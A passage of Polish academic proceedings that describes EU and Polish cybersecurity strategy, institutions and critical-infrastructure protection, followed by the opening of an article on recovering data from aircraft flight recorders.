sztuczną inteligencją, rozwojem technologii kwantowej mogą być elementem budowania
pozycji UE na tle innych międzynarodowych rozwiązań prawnych, strategicznych czy
branżowych w zakresie ochrony cyberprzestrzeni. W tym względzie szczególnie istotna
jest współpraca w zakresie przeciwdziałania ingerowania w infrastrukturę krytyczną,
powiązania handlowe i finansowe, czy też demokratyczne instytucje i procesy.
Warto wskazać, iż problematyka cyberbezpieczeństwa jest traktowana
priorytetowo również w budżecie UE. W ramach programu „Cyfrowa Europa” UE będzie
wspierać badania naukowe, innowacje i infrastrukturę w dziedzinie cyberbezpieczeństwa,
cyberobronę oraz unijny sektor cyberbezpieczeństwa.
Przestępczość w cyberprzestrzeni przynosi znaczne straty dla światowej
gospodarki, sektora publicznego i prywatnego. Wg ekspertów zajmujących się tym
zagadnieniem cyberprzestępczość powoduje straty w kwocie ok. 300-400 mld USD
rocznie, na kwotę tą składają się takie koszty jak: utrata wartości intelektualnej i poufnych
danych; kradzież informacji gospodarczych i wynikających z nich manipulacji na giełdzie;
koszty alternatywne, jak m.in. zakłócenia w pracy czy związane z zmniejszonym
7
Joint Communication To The European Parliament And The Counci, The EU's Cybersecurity Strategy for the
Digital Decade https://digital-strategy.ec.europa.eu/en/library/eus-cybersecurity-strategy-digital-decade-0
(dostęp 18.02.2023).
102
zaufaniem do działalności on-line; dodatkowe koszty zabezpieczeń i polis
ubezpieczeniowych
8
.
W 2022 r. do Krajowego Zespołu Reagowania na Incydenty
Bezpieczeństwa Komputerowego zgłoszono ponad 320 tys. przypadków zagrożenia
cyberbezpieczeństwa to o ponad 176 % więcej niż w 2021 r
9
. To zidentyfikowanych
trendów w tym zakresie Raport ENISA w 2022 r. zaliczył: znaczny wzrost ataków na
dostępność usług, zwłaszcza typu DDoS, nową falę haktywizmu, zwłaszcza od momentu
rozpoczęcia kryzysu rosyjsko-ukraińskiego, czy phishing.
Warto zwrócić uwagę również na rozwijające się złożone ataki APT, czyli
zorganizowane, złożone i zaawansowane operacje w sieci mające charakter operacji
militarnych i pozamilitarnych, w tym, w coraz większym zakresie wykorzystywanie
sztucznej inteligencji, deep fake czy też operacji w sieci jako element operacji
hybrydowych.
Zidentyfikowane w ten sposób zagrożenia implikują konieczność
podejmowania stosownych działań na poziomie strategicznym.
Warto wskazać, iż dokument strategii wyróżnia także działania o
charakterze edukacyjnym w sferze gospodarczej i publicznej w zakresie cyberprzestrzeni,
aby podnosić kwalifikacje i kompetencje cyfrowe.
Strategiczne inicjatywy UE w zakresie podnoszenia cyberbezpieczeństwa w
ramach realizacji założeń strategii, to m. in.:
− przyjęcie zmienionej dyrektywy NIS w sprawie bezpieczeństwa sieci i
informacji;
− przyjęcie rozwiązań regulacyjnych dotyczących Internetu rzeczy;
− zapewnienie odpowiedniego finansowania przedsięwzięć publicznych,
prywatnych i naukowych (zwłaszcza poprzez inicjatywę „Cyfrowa Europa
programu, programu Horyzont Europa i instrumentu odbudowy, wartość
inwestycji 4,5 mld euro i inwestycje prywatne w latach 2021-2027);
− powołanie unijnej sieci centrów operacji bezpieczeństwa z obsługą sztucznej
inteligencji;
− stworzenie infrastruktury komunikacyjnej wykorzystującej technologie
kwantowe,
− powszechne przyjęcie technologii cyberbezpieczeństwa poprzez specjalne
wsparcie finansowe dla MŚP w ramach centrów innowacji cyfrowych;
− rozwój unijnej usługi rozpoznawania nazw DNS jako bezpiecznej i otwartej
alternatywy dla UE;
− dostęp obywateli, przedsiębiorstw i administracji publicznej do bezpiecznego
Internetu.
W systemie polskich dokumentów strategicznych z obszarów bezpieczeństwa
znajdują się również dotyczące problematyki przestrzeni cyfrowych. W hierarchii
krajowych dokumentów strategicznych najistotniejszą jest Strategia Bezpieczeństwa
8
K. Jasiołek, Cyberprzestępczość: 400 mld rocznie globalnych strat,
https://www.komputerswiat.pl/aktualnosci/bezpieczenstwo/cyberprzestepczosc-400-mld-rocznie-
globalnych-strat/3s80qk1 (dostęp: 21.02.2024).
9
E. Rutkowska, Cyberprzestępcy w akcji. Tak mogą Cię okraść!,
https://forsal.pl/swiat/bezpieczenstwo/artykuly/8630664,cyberprzestepcy-w-akcji-tak-moga-cie-okrasc.html
(dostęp: 22.02.2024).
103
Narodowego Rzeczypospolitej Polskiej z 2020 r. Definiuje ona następujące interesy
narodowe w kontekście bezpieczeństwa:
1. Strzeżenie niepodległości, nienaruszalności terytorialnej, suwerenności oraz
zapewnienie bezpieczeństwa państwa i obywateli.
2. Kształtowanie porządku międzynarodowego, opartego na solidarnej
współpracy i poszanowaniu prawa międzynarodowego, dającego gwarancje
bezpiecznego rozwoju Polski.
3. Umacnianie tożsamości narodowej i strzeżenie dziedzictwa narodowego.
4. Zapewnienie warunków do trwałego i zrównoważonego rozwoju społecznego i
gospodarczego oraz ochronę środowiska naturalnego.
Na podstawie w taki sposób zdefiniowanych interesów narodowych zostały opracowane
następujące filary bezpieczeństwa.
1. Filar I - Bezpieczeństwo państwa i obywateli,
2. Filar II - Polska w systemie bezpieczeństwa międzynarodowego,
3. Filar III - Tożsamość i dziedzictwo narodowe,
4. Filar IV - Rozwój społeczny i gospodarczy. ochrona środowiska.
Filar I, który w istotnym stopniu odnosi się do problematyki zagrożeń w cyberprzestrzeni,
składa się z następujących elementów:
− Zarządzanie bezpieczeństwem narodowym,
− Odporność państwa i obrona powszechna,
− Siły Zbrojne Rzeczypospolitej Polskiej,
− Cyberbezpieczeństwo,
− Przestrzeń informacyjna.
W dokumencie strategii przyjęto cyberprzestrzeń jako nowe środowisko
bezpieczeństwa, które z uwagi na obszar oddziaływania dotyczy różnych segmentów
bezpieczeństwa, w związku z tym konieczne do podjęcia są działania w zakresie:
budowania odpowiedniej odporności instytucji państwa, kształtowania bezpieczeństwa
przestrzeni informacyjnej, sił zbrojnych czy cyberbezpieczeństwa. W szczególności
strategia wskazuje na zagrożenia związane z cyberatakami i wojną informacyjną.
Cyberataki wiążą się przede wszystkim z infrastrukturą krytyczną państwa, infrastrukturą
istotną z punktu widzenia bezpieczeństwa i obronności, jak również kształtowania opinii
publicznej społeczeństw zachodu. Poprzez narzucanie odpowiedniej narracji wokół
określonych problemów, procesów politycznych, rozwoju określonych grup wpływu, czy
też próbę ingerowania w procesy demokratyczne (wybory, referenda).
Zgodnie ze Strategią Bezpieczeństwa Narodowego obszary zasygnalizowane w
tym dokumencie powinny znaleźć rozwinięcie i odzwierciedlenie w sektorowych,
krajowych dokumentach strategicznych w dziedzinie bezpieczeństwa, w tym również w
zakresie ochrony cyberprzestrzeni.
Istotnym elementem strategii jest inicjatywa w zakresie stworzenia ram
prawnych dla zarządzania zintegrowanym bezpieczeństwem narodowym, który w
szczególności objąłby takie sfery jak kierowanie bezpieczeństwem narodowym,
zarządzanie kryzysowe oraz cyberbezpieczeństwo. Dostrzeżono również problem
rozwijającej się przestępczości występującej w cyberprzestrzeni, która dotyka różnych
aspektów gospodarki, usług finansowych, telekomunikacyjnych, czy też indywidualnych
uczestników i beneficjentów cyberprzestrzeni.
W kontekście działań preparacyjnych strategia wskazuje na konieczność
uzyskania zdolności operacyjnych do prowadzenia pełnego spektrum działań militarnych
104
w cyberprzestrzeni, poprzez rozwój wojska obrony cyberprzestrzeni oraz budowanie
zdolności do prowadzenia działań w przestrzeni kosmicznej, jak również do działań
informacyjnych.
Z uwagi na istotny charakter cyberprzestrzeni dla rozwoju państwa, sfer
kulturalnych, społecznych, finansowych, gospodarczych czy politycznych kwestiom tym
został poświęcony odrębny podrozdział dotyczący cyberbezpieczeństwa. Świadczy to o
istotnej roli tego obszaru bezpieczeństwa, który autorzy upatrują jako źródło szans dla
krajowej gospodarki, usług finansowych czy innowacyjnych projektów w tych
segmentach.
Warto zauważyć, iż aktywność państwa w kontekście budowania ochrony
cyberprzestrzeni przebiega w wielu wymiarach: instytucjonalnym, operacyjnym,
systemowym, edukacyjnym i prawnym.
Podstawową instytucją, schematem kształtującym krajowe bezpieczeństwo w
zakresie przeciwdziałania nieprawidłowościom i incydentom wstępującym w
cyberprzestrzeni jest krajowy system cyberbezpieczeństwa - powołany na podstawie
ustawy z dnia 5 lipca 2017 r. o krajowym systemie cyberbezpieczeństwa
10
, przy czym
system to celowo określony zbiór elementów i zbiór sprzężeń między nimi, które
wspólnie określają cechy całości. Definiowanie systemu polega na wyodrębnieniu:
elementów otoczenia systemu, istotnych sprzężeń między elementami systemu oraz
istotnych sprzężeń systemu z jego otoczeniem
11
.
W przypadku krajowego systemu cyberbezpieczeństwa funkcjonują w ramach
tego systemu podmioty/organizacje, które mają określoną misję i zadania do realizacji,
pomiędzy którymi zachodzą określone sprzężenia/zależności w zakresie wymiany
informacji, dobrych praktyk, wymiany myśli.
Do istotniejszych elementów systemu należą:
− Zespoły CSIRT – zespoły reagowania na incydenty komputerowe oraz zespoły
sektorowe (bankowy, energetyczny, telekomunikacyjny),
− Operatorzy usług kluczowych;
− Dostawcy usług kluczowych;
− Kolegium ds. Cyberbezpieczeństwa
− Pełnomocnik rządu ds. Cyberbezpieczeństwa
− Punkt Kontaktowy ds. Cyberbezpieczeństwa.
Celem ustawy o krajowym systemie cyberbezpieczeństwa jest określenie
organizacji oraz sposobu funkcjonowania krajowego systemu cyberbezpieczeństwa, jak
również sposobu sprawowania nadzoru i kontroli w zakresie stosowania jej przepisów;
uzupełniająco ustawa normuje także zakres i tryb stanowienia Strategii
Cyberbezpieczeństwa Rzeczypospolitej Polskiej
12
.
W ustawie o krajowym systemie cyberbezpieczeństwa zdefiniowano termin
cyberbezpieczeństwo jako odporność systemów informacyjnych na wszelkie działania
naruszające poufność, integralność, dostępność i autentyczność przetwarzanych danych
lub związanych z nimi usług oferowanych przez te systemy
13
.
Istotnym elementem krajowego systemu cyberbezpieczeństwa jest
monitorowanie i identyfikowanie potencjalnie możliwych do wystąpienia incydentów w
10
Dz. U. nr 1560, ze zm.
11
Encyklopedia Zarządzania, https://mfiles.pl/pl/index.php/System (dostęp: 19.02.20223).
12
Pod. red. C. Banasiński, M. Rojszczak, Cyberbezpieczeństwo, Wyd. Wolters Kluwer, Warszawa 2020, s. 16.
13
Ustawa o krajowym systemie cyberbezpieczeństwa, art. 2 pkt 4.
105
cyberprzestrzeni, natomiast ocena stopnia ich oddziaływania na bezpieczeństwo tych
systemów wskazuje na klasyfikację incydentu (jako krytyczny, poważny, istotny, czy w
podmiocie publicznym). Taka hierarchizacja zagrożeń ma istotne znaczenie z punktu
widzenia działalności poszczególnych elementów systemu nadając priorytetyzację ich
działaniom.
Krajowym dokumentem strategicznym z obszaru cyberbezpieczeństwa jest
Strategia Cyberbezpieczeństwa Rzeczypospolitej Polskiej na lata 2019 – 2024. Głównym
celem Strategii jest podniesienie poziomu odporności na cyberzagrożenia oraz poziomu
ochrony informacji w sektorach: publicznym, militarnym i prywatnym.
Strategia zawiera następujące szczegółowe cele strategiczne;
1) rozwój krajowego systemu cyberbezpieczeństwa.
2) podniesienie poziomu odporności systemów informacyjnych administracji
publicznej i sektora prywatnego oraz osiągnięcie zdolności do skutecznego
zapobiegania i reagowania na incydenty
3) Zwiększenie potencjału narodowego w zakresie technologii
cyberbezpieczeństwa.
4) Budowanie świadomości i kompetencji społecznych w zakresie
cyberbezpieczeństwa.
5) Zbudowanie silnej pozycji międzynarodowej Rzeczypospolitej Polskiej w
obszarze cyberbezpieczeństwa.
W kontekście instytucjonalnym na uwagę zasługuje powołanie Narodowego
Centrum Bezpieczeństwa Cyberprzestrzeni - Dowództwo Komponentu Wojsk Obrony
Cyberprzestrzeni. Do zadań Narodowego Centrum Bezpieczeństwa Cyberprzestrzeni
należy m.in:
• prowadzenie badań, projektowanie, budowa, wdrażanie, użytkowanie oraz
ochrona narodowych technologii kryptologicznych;
• wytwarzanie nowych produktów dla państwa przez zespolenie potencjału
naukowego i przemysłowego w obszarze zaawansowanych technologii
informatycznych i kryptograficznych;
• realizacja zadań w zakresie kryptologii zleconych, za pośrednictwem Ministra
Obrony Narodowej, przez inne organy państwa lub administracji publicznej
14
.
Warto odnotować również powołanie w Policji Centralnego Biura Zwalczania
Cyberprzestępczości Policji, które jest jednostką organizacyjną Policji służby zwalczania
cyberprzestępczości, odpowiedzialną za realizację na obszarze całego kraju zadań w
zakresie:
− rozpoznawania i zwalczania przestępstw popełnionych przy użyciu systemu
informatycznego, systemu teleinformatycznego lub sieci teleinformatycznej
oraz zapobiegania tym przestępstwom, a także wykrywania i ścigania sprawców
tych przestępstw;
− wspierania w niezbędnym zakresie jednostek organizacyjnych Policji w
rozpoznawaniu, zapobieganiu i zwalczaniu przestępstw
15
.
Kolejnym wymiarem bezpieczeństwa państwa w kategoriach cyberprzestrzeni
jest infrastruktura krytyczna. Z uwagi na szeroki zakres przedmiotowy zagadnienia
14
https://ncbc.wp.mil.pl/pl/pages/zadania-2017-01-16-4/ (dostęp: 14.02.2022).
15
https://policja.pl/pol/cbzc/309,Zadania-Centralnego-Biura-Zwalczania-Cyberprzestepczosci.html (dostęp
15.02.2022).
106
infrastruktury krytycznej, ma ona istotne znaczenie dla życia obywateli, przedsiębiorstw,
gospodarki i kultury, jak również w wymiarze bezpieczeństwa - w tym o charakterze
militarnym.
Infrastruktura krytyczna państwa to urządzenia, budowle, instalacje i usługi
kluczowe dla funkcjonowania bezpieczeństwa państwa. W Polsce do tej infrastruktury
zalicza się urządzenia, budowle i kluczowe instalacje dotyczące:
− Zaopatrzenia w energie i paliwa,
− Łączności i sieci teleinformatycznych,
− Transportu i komunikacji,
− Systemów bankowych i finansowych,
− Zaopatrzenia w żywność i wodę,
− Ochrony zdrowia,
− Ratownictwa,
− Ciągłości działania administracji publicznej,
− Produkcji, składowania przechowywania i stosowania substancji chemicznych
i promieniotwórczych
16
.
Narodowy Program Ochrony Infrastruktury Krytycznej jest dokumentem
strategicznym z punktu widzenia bezpieczeństwa. Zawiera konkretyzację działań
koniecznych do podjęcia, celem skutecznej ochrony infrastruktury krytycznej, dzieląc je
na: działania organizacyjno-prawne, działania techniczne, działania edukacyjne i
szkoleniowe, koordynacja działań, jak również ich finansowanie. Ponadto, Program
wskazuje na międzynarodowy charakter zagrożeń związanych z infrastrukturą krytyczną,
jak również pokazuje miejsce na tle europejskiej infrastruktury krytycznej.
Realizacja tego celu wymaga osiągnięcia szeregu celów pośrednich:
− zdobycie określonego poziomu świadomości, wiedzy i kompetencji wszystkich
uczestników Programu w zakresie znaczenia IK dla sprawnego funkcjonowania
państwa oraz sposobów i metod jej ochrony,
− wprowadzenie metodyki oceny ryzyka uwzględniającej pełny wachlarz
zagrożeń, w tym metodyki postępowania z zagrożeniami o bardzo małym
prawdopodobieństwie i katastrofalnych skutkach,
− wprowadzenie skoordynowanego i opartego na ocenie ryzyka podejścia do
realizacji zadań z zakresu ochrony IK,
− budowa partnerstwa między uczestnikami procesu ochrony IK,
− wprowadzenie mechanizmów wymiany i ochrony informacji przekazywanych
między uczestnikami procesu ochrony IK.
Warte podkreślenie jest, iż odpowiedzialnym za przygotowanie Narodowego
Programu Ochrony Infrastruktury Krytycznej jest Rządowe Centrum Bezpieczeństwa,
które pełni główną rolę w budowie systemu ochrony infrastruktury krytycznej, opartego
na współodpowiedzialności, współpracy i zaufaniu. Rządowe Centrum Bezpieczeństwa
jest również elementem krajowego systemu cyberbezpieczeństwa w zakresie
przyjmowania informacji o stanie bezpieczeństwa w cyberprzestrzeni, jak również
16
Pod. red. J. Pawłowski, B. Zdrodowski, M. Kuliczkowski, Słownik terminów z zakresu bezpieczeństwa,
Wyd. A. Marszałek, Toruń 2020.
107
dokonywanie analizy pod kątem ciągłości działania elementów infrastruktury
krytycznej
17
. Do podstawowych zadań RCB należy
18
:
• Obsługa Rządowego Zespołu Zarządzania Kryzysowego (RZZK) –
międzyresortowego zespołu opiniotwórczo–doradczego, właściwego w
sprawach inicjowania i koordynowania działań w zakresie zarządzania
kryzysowego. Prezes Rady Ministrów jest przewodniczącym RZZK, funkcje
sekretarza pełni dyrektor RCB.
• Monitorowanie i przeprowadzanie analizy zagrożeń w oparciu o dane
uzyskiwane ze wszystkich ośrodków kryzysowych funkcjonujących w ramach
administracji publicznej.
• Pełnienie całodobowego dyżuru zapewniającego obieg informacji w ramach
Krajowego Centrum Zarządzania Kryzysowego. W przypadku zagrożenia
KCZK uruchamia procedury zarządzania kryzysowego oraz odbiera i
dystrybuuje sygnały przekazywane przez NATO, UE i ONZ.
• Ostrzeganie przed zagrożeniami – ALERT RCB oraz publikacja informacji w
mediach społecznościowych (Twitter, Facebook, Instagram), na ekranach
wielkoformatowych, w środkach masowego przekazu.
• Nadzór nad ochroną krajowej i europejskiej infrastruktury krytycznej.
• Tworzenie planów, raportów, analiz i rekomendacji dotyczących zagrożeń dla
bezpieczeństwa państwa i prognoz sytuacji kryzysowych.
• Tworzenie Krajowego Planu Zarządzania Kryzysowego wyznaczającego
kierunki planowania cywilnego na szczeblu centralnym i wojewódzkim.
• Tworzenie Raportu o zagrożeniach bezpieczeństwa narodowego – krajowej
oceny ryzyka i strategii ograniczenia ryzyka katastrof.
• Stały dyżur na potrzeby podwyższania gotowości obronnej państwa.
Dodatkowe zadania to:
• Przeciwdziałanie incydentom w obszarze cyberbezpieczeństwa w ramach
Zespołu ds. Incydentów Krytycznych (ZIK).
• Prowadzenie i uczestnictwo w ćwiczeniach i szkoleniach z zakresu zarządzania
kryzysowego oraz komunikacji w kryzysie (m.in. Crisis Management Exercise,
Integrated Resolve, LIBERO).
• Zapewnia obieg jawnych i niejawnych informacji między krajowymi
podmiotami zarządzania kryzysowego oraz ze strukturami NATO i UE.
Administruje Systemem Niejawnej Poczty Internetowej OPAL, który obejmuje
ponad dwieście podmiotów wykonujących zadania w zakresie zarządzania
kryzysowego i obronności.
• Monitorowanie i analiza zagrożeń hybrydowych
• Tworzenie Raportu o Zagrożeniach Bezpieczeństwa Narodowego – krajowej
oceny ryzyka i strategii jego ograniczania.
• Pełnienie funkcji krajowego punktu kontaktowego dla ONZ ds. wdrażania
Ramowego Programu Działań z Sendai na lata 2015-2030 w sprawie
ograniczenia ryzyka katastrof.
• Inne zadania zlecone przez Prezesa Rady Ministrów – m.in. organizacja
17
Pod. red. C. Banasiński, M. Rojszczak, Cyberbezpieczeństwo, op. cit. s. 22.
18
https://www.gov.pl/web/rcb/o-rcb2 (dostęp: 07.01.2024).
108
relokacji obywateli Afganistanu współpracujących z NATO i ONZ, szczepienia
pracowników Kwatery Głównej NATO i obserwatorów OBWE oraz wsparcie
słowackiej i rumuńskiej służby zdrowia w walce z COVID-19.
PODSUMOWANIE
Cyberprzestępczość jest jednym z najbardziej dochodowych segmentów
działalności przestępczej, korzyści uzyskiwane z tej działalności przewyższają
uzyskiwane chociażby z zorganizowanej przestępczości ekonomicznej, czy kryminalnej.
Podczas Szczytu NATO w Warszawie w 2016 r. Sojusz uznał cyberprzestrzeń za czwartą
domenę prowadzenia działań bojowych. Działania podejmowane w cyberprzestrzeni
oddziałują na obszar kultury, edukacji, biznesu, gospodarki czy aktywności politycznej.
W związku z powyższym organizacja polityczna jakim jest państwo musi przedstawiać
opis szans i zagrożeń związanych z rozwojem różnych aspektów jego funkcjonowania w
tej nowej przestrzeni informacyjnej, w której istotną rolę odgrywają kompetencje
uczestnika/użytkownika sieci Internet.
W sytuacji szczególnego zagrożenia konstytucyjnego ustroju państwa,
bezpieczeństwa obywateli lub porządku publicznego, w tym spowodowanego
działaniami o charakterze terrorystycznym lub działaniami w cyberprzestrzeni, które nie
może być usunięte poprzez użycie zwykłych środków konstytucyjnych, Rada Ministrów
może podjąć uchwałę o skierowaniu do Prezydenta Rzeczypospolitej Polskiej wniosku o
wprowadzenie stanu wyjątkowego
19
. W związku z powyższym w kontekście działań
podejmowanych w cyberprzestrzeni – może zostać wprowadzony konstytucyjny stan
nadzwyczajny – stan wyjątkowy. Przy czym przez cyberprzestrzeń rozumie się przestrzeń
przetwarzania i wymiany informacji tworzoną przez systemy teleinformatyczne wraz z
powiązaniami pomiędzy nimi oraz relacjami z użytkownikami
20
.
Nowe środowisko bezpieczeństwa – cyberprzestrzeń – jest opisane w kontekście
strategicznych dokumentów bezpieczeństwa – Strategii Bezpieczeństwa Narodowego,
Strategii Cyberbezpieczeństwa czy Narodowego Programu Ochrony Infrastruktury
Krytycznej - świadczy to o rozwoju kultury strategicznej w administracji państwowej.
Wzrasta poziom merytoryczny przygotowywanych koncepcji, zawierają one realne
uwarunkowania oraz otoczenie zewnętrzne i obejmują całe spektrum działania państwa.
Brak jest jednak całościowych analiz sektora cyberbezpieczeństwa objętego strategią,
zasadnym wydaje się potrzeba opracowania Białej Księgi Cyberbezpieczeństwa ze
wskazaniem nowych uwarunkowań instytucjonalnych, prawnych, organizacyjnych i
operacyjnych. Budowanie strategii jest procesem ciągłym, w którym dostrzegane są nowe
podatności, szanse. W związku z tym istotnym byłoby przedstawienie nowego miejsca w
krajowym systemie cyberbezpieczeństwa Rządowego Centrum Cyberbezpieczeństwa,
czy też Centralnego Biura Zwalczania Cyberprzestępczości. Aktualna strategia
cyberbezpieczeństwa nie opisuje w sposób kompleksowy i komplementarny złożoności
działań organów państwa zajmujących się przeciwdziałaniem i zwalczaniem zagrożeń
występujących w cyberprzestrzeni.
Ponadto, zasadnym wydaje się powołanie niezależnego urzędu, który
całościowo koordynowałby działania instytucji krajowego systemu cyberbezpieczeństwa
19
Art. 2 ust. 1 ustawy z dnia 21 czerwca 2002 r. o stanie wyjątkowym. (Dz. U. 2017, poz. 1928).
20
określone w art. 3 pkt 3 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów
realizujących zadania publiczne (Dz. U. z 2017 r. poz. 570).
109
– Komisji Nadzoru Cyberbezpieczeństwa. Uzasadnieniem dla powołania takiego urzędu
są zmieniające się obszary i środowisko bezpieczeństwa, które wzajemnie przenikając się,
implikują nowe, złożone zagrożenia bezpieczeństwa państwa i jego obywateli. A ponadto,
nowe regulacje prawne uchwalone już na poziomie UE, a oczekujące na implementację
do polskiego systemu prawego
21
.
Bibliografia
1. Strategia Bezpieczeństwa UE 2020-2025.
2. Strategia Cyberbezpieczeństwa UE.
3. Strategia Bezpieczeństwa Narodowego z 2020 r.
4. Strategia Cyberbezpieczeństwa Rzeczypospolitej Polskiej na lata 2019-2024.
5. Pod. red. C. Banasiński, M. Rojszczak, Cyberbezpieczeństwo, Wyd. Wolters
Kluwer, Warszawa 2020.
6. K. Jasiołek, Cyberprzestępczość: 400 mld rocznie globalnych strat,
https://www.komputerswiat.pl/aktualnosci/bezpieczenstwo/cyberprzestepczosc-
400-mld-rocznie-globalnych-strat/3s80qk1.
7. W. Kopaliński, Słownik wyrazów obcych i zwrotów obcojęzycznych z almanachem,
Wyd. Muza, Warszawa 2000.
8. Pod. red. J. Pawłowski, B. Zdrodowski, M. Kuliczkowski, Słownik terminów z
zakresu bezpieczeństwa, Wyd. A. Marszałek, Toruń 2020.
9. E. Rutkowska, Cyberprzestępcy w akcji. Tak mogą Cię okraść!,
https://forsal.pl/swiat/bezpieczenstwo/artykuly/8630664,cyberprzestepcy-w-akcji-
tak-moga-cie-okrasc.html (dostęp: 22.02.2024).
10. L. Wiszniewski, Polskie planowanie strategiczne. Miejsce służb specjalnych w
strategiach bezpieczeństwa, Przegląd Bezpieczeństwa Wewnętrznego 14/16.
11. https://policja.pl/pol/cbzc/309,Zadania-Centralnego-Biura-Zwalczania-
Cyberprzestepczosci.html (dostęp 19.02.2023).
12. https://sjp.pwn.pl/sjp/strategia;2576315.
13. https://www.gov.pl/web/rcb/o-rcb2 (dostęp: 07.01.2024).
14. Ustawa z dnia 21 czerwca 2002 r. o stanie wyjątkowym (Dz. U. 2017, poz. 1928).
15. Ustawa z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów
realizujących zadania publiczne (Dz. U. z 2017 r. poz. 570).
16. Ustawa z dnia 5 lipca 2018 r. o krajowym systemie cyberbezpieczeństwa (tj. Dz. U.
z 2022 r., poz. 1863, 2666).
17. Joint Communication To The European Parliament And The Council, The EU's
Cybersecurity Strategy for the Digital Decade https://digital-
strategy.ec.europa.eu/en/library/eus-cybersecurity-strategy-digital-decade-0
(dostęp 18.02.2023).
18. Dyrektywa w sprawie środków na rzecz wysokiego wspólnego poziomu
cyberbezpieczeństwa w całej Unii (dyrektywa NIS2).
21
Dyrektywa w sprawie środków na rzecz wysokiego wspólnego poziomu cyberbezpieczeństwa w całej Unii
(Dyrektywa NIS2)
134
ODZYSKIWANIE DANYCH Z CZARNEJ SKRZYNKI
BLACK BOX DATA RECOVERY
Łukasz PIETRZYKOWSKI, Sasha SHEREMETOV, Igor LOSKUTOV
Rusolut Sp. z o.o., Poland
Streszczenie
Artykuł przedstawia proces ekstrakcji danych z rejestratorów lotu oraz testy jakie
rejestratory te przechodzą. Przedstawiono również moduł pamięci stosowany w
nowoczesnych rejestratorach lotu oraz sposób odzysku obrazu pamięci bezpośrednio z
chipa pamięci NAND wydobytego z modułu.
Słowa kluczowe: Black Box, rejestrator lotu, NAND Flash, chip-off, odzyskiwanie
danych, dochodzenia lotnicze, czarna skrzynka
Summary
The article describes the procedure of chip-off data recovery from Aircraft Flight
Recorder, the stress tests, internal structure, flash storage that is used in modern devices.
Keywords: Aircraft Black Box, Aircraft Flight Recorder, NAND Flash, chip-off data
recovery, aircraft accident investigation
Wstęp Wiedzą powszechną jest, że rejestratory lotu zwane czarnymi skrzynkami
stanowią integralną część samolotów, helikopterów oraz innych maszyn lotniczych.
Rejestratory zazwyczaj są dwa: rejestrator dźwięku kokpitu (cockpit voice recorder) oraz
rejestrator parametrów lotu (flight data recorder). Nie jest tajemnicą także zastosowanie
tych urządzeń. Zasady bezpieczeństwa zwłaszcza w takiej dziedzinie jak lotnictwo są
bardzo restrykcyjne. Niestety pomimo wszystkich zabezpieczeń katastrofy zdarzały się,
zdarzają i zdarzać się będą. Dlatego też dane które są rejestrowane w czarnych skrzynkach
są niezwykle ważne, ponieważ dostarczają informacji, które mogą zapobiec kolejnym
tragediom. W niniejszym artykule przedstawimy jak wygląda pozyskanie danych z
takiego rejestratora, jakie testy musi on przejść oraz co można zrobić w przypadku, kiedy
moduł pamięci - najważniejsza część - ulegnie zniszczeniu.
Przedmiot artykułu stanowi badanie, analiza i odzyskiwanie danych z
rejestratora D.T.MUX Sentinel wyprodukowanego i udostępnionego dzięki uprzejmości
firmy ETEP. [1]
135
Rys. 1 Rejestratory lotu w samolocie.
Budowa czarnej skrzynki
Rejestrator lotu można podzielić na trzy główne elementy:
• Crash Protected Memory Block (CPM) - jest to najważniejsza część urządzenia.
Wewnątrz CPM znajduje się odpowiednio zabezpieczony moduł pamięci, gdzie
zapisywane i przechowywane są dane.
• Golden chassis - jest to nie tylko dolna część obudowy, lecz także segment, w
którym znajduje się szereg konektorów odpowiadających za zasilanie oraz
przepływ danych, które docelowo zapisywane są na module pamięci
znajdującym się w CPM.
• Underwater Locator Beacon – lokalizator jest elementem niezbędnym w
przypadku, kiedy z różnych przyczyn, rejestrator znajdzie się pod wodą.
Zdj. 1 Badane urządzenie D.T.MUX Sentinel.
136
Testy
Rejestratory lotu, aby mogły być włączone do użytku, muszą przejść
certyfikację w celu spełnienia międzynarodowych norm (DO-160, MIL-STD-810).
Rejestrator poddawany jest wielu testom. Poniżej kilka z nich:
• Testy zderzeniowe - analogiczne do crash testów samochodowych. Urządzenie
jest rozpędzane do prędkości 140m/s, po czym uderza we wcześniej
przygotowaną ścianę.
• Uderzenie punktowe - cylinder o masie ok ~227kg, zakończony trzpieniem o
długości 40 ± 1 mm i średnicy 6.35 ± 0.1 mm. Zrzucony jest z wysokości trzech
metrów na urządzenie.
• Testy ciśnieniowe - rejestrator zostaje poddany ciśnieniu jakie panuje na
głębokości 6 km przez cza136s 24 godzin. Test wykonywany jest przy użyciu
specjalistycznego sprzętu, który potrafi odtworzyć panujące na tej głębokości
warunki. Przy tak dużym ciśnieniu woda może wedrzeć się do urządzenia, lecz
pomimo zalania, dane powinny być możliwe do pozyskania z modułu pamięci.
• Testy temperaturowe - są przeprowadzane dwa. Pierwszy to wystawienie
modułu CPM na temperaturę 1100°C przez 60 minut. Drugim testem jest
poddanie modułu temperaturze 260°C na czas dziesięciu godzin.
Zdj. 2 Kolejno testy zderzeniowe, uderzenie punktowe, ciśnieniowe oraz temperaturowe na
rejestratorze D.T.MUX Sentinel.[1]
Oczywiście przeprowadzanych jest znacznie więcej testów, między
innymi takich jak odporność na różnego rodzaju płyny, odporność na zgniatanie pod
różnym kątem i wiele innych.
Odczyt danych z rejestratora
Aby normy zostały spełnione, po wykonanych testach musi istnieć
możliwość pozyskania danych na przynajmniej jeden z dwóch sposobów:
• Uzyskanie danych z w pełni działającego urządzenia poprzez kabel zakończony
złączem RJ-45
• Uzyskanie danych przy pomocy adaptera SATA ze sprawnego modułu pamięci
wydobytego z CPM.
137
Zdj. 3 Uzyskiwanie danych z działającego rejestratora D.T.MUX Sentinel oraz z modułu pamięci
przy użyciu adaptera SATA.
Moduł pamięci
W miarę upływu lat w każdej dziedzinie następują zmiany. Zwłaszcza w
tak prężnie rozwijającej się branży jak lotnictwo. Pierwsze rejestratory stosowane w
komercyjnym lotnictwie używały stalowej taśmy jako nośnika przechowującego dane.
Rozwój technologii sprawił, że taśmy stalowe zostały wyparte przez taśmy magnetyczne.
Następnie nadeszła era talerzowych dysków twardych, które zostały zastąpione dyskami
SSD.
Zdj. 4 Dysk SSD znajdujący się wewnątrz CPM pochodzącego z rejestratora D.T.MUX Sentinel.
138
Nowoczesne rejestratory wyposażone są w dyski SSD jako moduły
pamięci. Celem wydobycia takiego modułu należy dostać się do wnętrza CPM, gdzie w
bloku termalnym znajduje się mały dysk twardy. Pamięć jest pokryta silikonem, co
stanowi dodatkowe zabezpieczenie przed zalaniem.
